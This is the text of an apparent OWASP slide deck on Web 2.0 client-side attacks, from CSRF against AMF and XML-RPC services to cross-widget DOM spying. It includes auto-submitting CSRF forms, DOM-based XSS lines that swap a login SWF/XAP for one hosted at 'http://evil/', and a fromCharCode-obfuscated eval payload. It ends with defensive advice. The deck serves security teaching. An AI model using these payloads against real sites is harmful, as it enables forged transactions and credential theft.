  • 52. AMF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST"> <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string ><string>clientId</string><string>correlationId</string><string>destination</strin g><string>headers</string><string>messageId</string><string>operation</string ><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><str ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje ct><string>68AFD7CE-BFE2-4881-E6FD- 694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body> </amfx>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 52
  • 53. XML <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodN ame><params><param><value><string>MSFT</string></value> </param><param><value><double>26</double></value></para m></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 53
  • 54. Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
  • 55. FLASHJACKING OWASP 55
  • 56. Flashjacking It is possible to have some integrated attacks DOM based XSS CSRF Flash DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.swf" OWASP 56
  • 57. Double eval – eval the eval Payload - document.getElementsByName('Login').item(0 ).src='http://192.168.100.200:8080/flex/Login n/Loginn.swf‘ Converting for double eval to inject ‘ and “ etc… eval(String.fromCharCode(100,111,99,117,109,101,110,116,4 6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97 ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10 9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49 ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4 7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103 ,105,110,110,46,115,119,102,39)) OWASP 57
  • 58. silvelightjacking It is possible to have some integrated attacks DOM based XSS CSRF Silvelight files DOM based issue can change xap file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.xap" OWASP 58
  • 60. Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications Small programs runs under browser JavaScript and HTML based components In some cases they share same DOM – Yes, same DOM It can cause a cross widget channels Exploitable … OWASP 60
  • 61. Cross DOM Access Widget 1 Widget 2 Widget 3 Email Widget RSS Feed Reader Attacker DOM – Shared DOM Setting the trap OWASP 61
  • 62. DOM traps It is possible to access DOM events, variables, logic etc. Sandbox is required at the architecture layer to protect cross widget access Segregating DOM by iframe may help Flash based widget is having its own issues as well Code analysis of widgets before allowing them to load OWASP 62
  • 63. Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
  • 65. Security at CODE Level JS, Flash or XAP should not have server side logic – should be presentation layer only … Obfuscation may help a bit – not full proof. Source code and object code analysis during blackbox testing would require Resource discoveries and fuzzing – a must for SOAP, JSON and AMF streams Careful with HTML 5 implementation DOM based scanning and analysis is required Cross streams and third party analytics OWASP 65
  • 66. http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66